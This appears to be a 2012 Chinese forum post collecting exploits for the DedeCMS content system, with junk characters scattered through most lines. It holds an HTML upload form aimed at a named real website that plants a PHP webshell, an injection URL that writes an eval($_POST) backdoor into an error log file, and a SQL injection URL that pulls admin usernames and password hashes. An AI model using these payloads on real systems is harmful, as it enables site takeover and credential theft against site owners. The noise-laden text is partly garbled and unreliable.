" E7 W$ `) c5 q% R4 {; v" y Q& T5 h1 o5 Y$ R* F
/ ^& t. h+ @: d3 x+ V: U- B# K2 ]0 s
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
6 W/ [6 N! q) r, i6 [<html>" k( A, k) E2 I1 i
<head>0 h+ q8 q) i/ `: j5 d
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
1 o3 `0 n! X' w) q/ W& n0 I7 j</head>
4 x: _/ T4 ^8 \4 t, ]' |<body style="FONT-SIZE: 9pt">- Y! ^2 j+ M# p, y4 J4 d
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />" U, ]3 ^2 C- n5 h& ?
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>+ V z5 H% d! t2 D+ o
<input type='hidden' name='activepath' value='/data/cache/' />- V& f! K. o+ y
<input type='hidden' name='cfg_basedir' value='../../' />5 e( h1 Z3 p0 t7 `; a! l
<input type='hidden' name='cfg_imgtype' value='php' />/ J8 {& e, U" C' C" x
<input type='hidden' name='cfg_not_allowall' value='txt' />
8 y$ B; z# z+ j) [& }) ~0 ?0 _<input type='hidden' name='cfg_softtype' value='php' />% @) T) o# [) }, R; e3 p/ V9 R
<input type='hidden' name='cfg_mediatype' value='php' />
, C6 t% G# w6 t" w0 G' K<input type='hidden' name='f' value='form1.enclosure' />3 Q8 P+ h* O2 E
<input type='hidden' name='job' value='upload' />; e$ a' ^3 ]. p
<input type='hidden' name='newname' value='fly.php' />
% G+ ` `9 u. a G6 L( l8 m$ QSelect U Shell <input type='file' name='uploadfile' size='25' />
! G) b8 I7 d% Y<input type='submit' name='sb1' value='确定' />
( f% t% [/ L# G</form>8 X* D5 F+ u: U& Q$ J7 D4 ~
<br />It's just a exp for the bug of Dedecms V55...<br />" h: Y, M* n& K6 g. [. ?. G! s% D
Need register_globals = on...<br />
1 B3 L# B9 ~1 D$ ?6 ~" xFun the game,get a webshell at /data/cache/fly.php...<br />
: n, i: C; f1 E6 w</body>
8 V% C1 r+ A( Q' t: E</html>
' Z) W( j1 S5 r. r
1 b, \& s) c7 ~5 w2 ?: P
4 c" g- M' \0 I* {5 Y! M5 Q( J) e6 f" h o& }3 o3 b8 u
$ [5 K6 T, _; y0 p3 V
1 Y! F* g( @( i, z2 M; J. C3 c- w+ q1 V5 k# h5 j7 h% ?& `/ P3 m/ N
: y' C0 l% E! B
) K8 k" D/ r! q7 q
2 y& M9 }. j8 V$ N' v& q
- y( L4 r& w( y7 e% s/ t& p! [织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
1 m( C* n+ g1 u, q利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。2 E* d% V; N1 y% b; r4 ]" ?
1. 访问网址:! Y N7 t( P& ?/ @+ Z- I- u
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
6 s$ B) d0 Y! q6 k7 k3 O2 E可看见错误信息: W; R5 }: R2 R% c2 m1 \7 i. l
/ W/ l& r: ~: w0 D! J4 M5 Q: X) u0 Y/ x1 s
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
0 o2 W) y% ~0 L E& i. iint(3) Error: Illegal double '1024e1024' value found during parsing
& d' G4 i, U3 JError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" H& Q; X N: G! C
9 ]# [' [* I9 K) U" r! {
0 { Y; S- ^' G# N3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
' u, K+ }2 x! ^5 T! Y- c7 ~* {9 i3 }
5 G3 X7 b' ]# ]* }7 @* s9 ^9 B<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
( _7 V) L# G8 H, s: O! C4 ~1 J8 I+ v' V; B; M
: H& T* ~0 o) t7 l$ z
按确定后的看到第2步骤的信息表示文件木马上传成功.: q" k2 Q. J. {, z8 ` Z/ U3 y
2 G3 [: j9 |: d' H: q2 J. _% i) @# W1 a1 ~" k
( @- K' N/ D( c2 A& ^. q! O, x
1 t3 j9 G& o; T7 Q0 ^
2 b+ f/ S7 |; S) I I* O
1 [! _& W# O6 p u
/ H& s: I" V0 L2 q @4 q$ A) @' K% J1 J
- u: E% a7 E- r2 w- p J
. ~+ Z+ N" c7 `* K
( u8 r8 P& w. S9 A0 @3 K& I; C5 o3 Z: A7 B- F) c: }, b
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
( ^" q8 {! M* _8 W. Bhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对